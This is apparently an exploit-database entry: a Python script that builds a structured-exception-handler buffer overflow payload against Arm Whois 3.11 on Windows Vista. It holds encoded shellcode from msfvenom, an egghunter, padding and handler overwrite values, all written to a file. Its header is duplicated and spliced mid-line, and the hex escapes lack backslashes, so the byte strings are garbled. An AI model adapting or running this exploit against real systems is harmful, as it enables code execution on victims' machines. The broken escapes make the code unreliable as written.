Arm Whois 3.11 Buffer Overflow

# Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR)
# Google Dork: [if applicable]
# Date: 23/11/2018
# Exploit Author: zephyr
# Vendor Homepage: http://www.armcode.co # Exploit Title: Arm Whois 3.11 - Buffer Overflow (ASLR)
# Google Dork: [if applicable]
# Date: 23/11/2018
# Exploit Author: zephyr
# Vendor Homepage: http://www.armcode.com
# Software Link: http://www.armcode.com/downloads/arm-whois.exe
# Version: 3.11
# Tested on: Windows Vista Ultimate SP1 x86 unpatched
# CVE :

# nSEH @ 672 on Windows Vista Ultimate SP1 unpatched
# msfvenom -p windows/exec cmd=calc.exe -e x86/shikata_ga_nai -a x86 --platform windows
nops = "x90"*20
buf = "w00tw00t" + nops + ("xbax0exc3xc8xe6xddxc4xd9x74x24xf4x5ex29"
"xc9xb1x31x83xc6x04x31x56x0fx03x56x01x21"
"x3dx1axf5x27xbexe3x05x48x36x06x34x48x2c"
"x42x66x78x26x06x8axf3x6axb3x19x71xa3xb4"
"xaax3cx95xfbx2bx6cxe5x9axafx6fx3ax7dx8e"
"xbfx4fx7cxd7xa2xa2x2cx80xa9x11xc1xa5xe4"
"xa9x6axf5xe9xa9x8fx4dx0bx9bx01xc6x52x3b"
"xa3x0bxefx72xbbx48xcaxcdx30xbaxa0xcfx90"
"xf3x49x63xddx3cxb8x7dx19xfax23x08x53xf9"
"xdex0bxa0x80x04x99x33x22xcex39x98xd3x03"
"xdfx6bxdfxe8xabx34xc3xefx78x4fxffx64x7f"
"x80x76x3exa4x04xd3xe4xc5x1dxb9x4bxf9x7e"
"x62x33x5fxf4x8ex20xd2x57xc4xb7x60xe2xaa"
"xb8x7axedx9axd0x4bx66x75xa6x53xadx32x02"
"x6exacx19x3bxd7xa4x1cx26xe8x12x62x5fx6b"
"x97x1axa4x73xd2x1fxe0x33x0ex6dx79xd6x30"
"xc2x7axf3x52x85xe8x9fxbax20x89x3axc3")

egghunter = nops + ("x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7") + "x90"*15
junk = "A"*(672-len(buf+egghunter))
nseh = "xebxc7x90x90"
seh = "x57x22x41"

payload = junk + buf + egghunter + nseh + seh

f = open("tmp.txt", 'wb')
f.write(payload)
f.close()
print len(payload)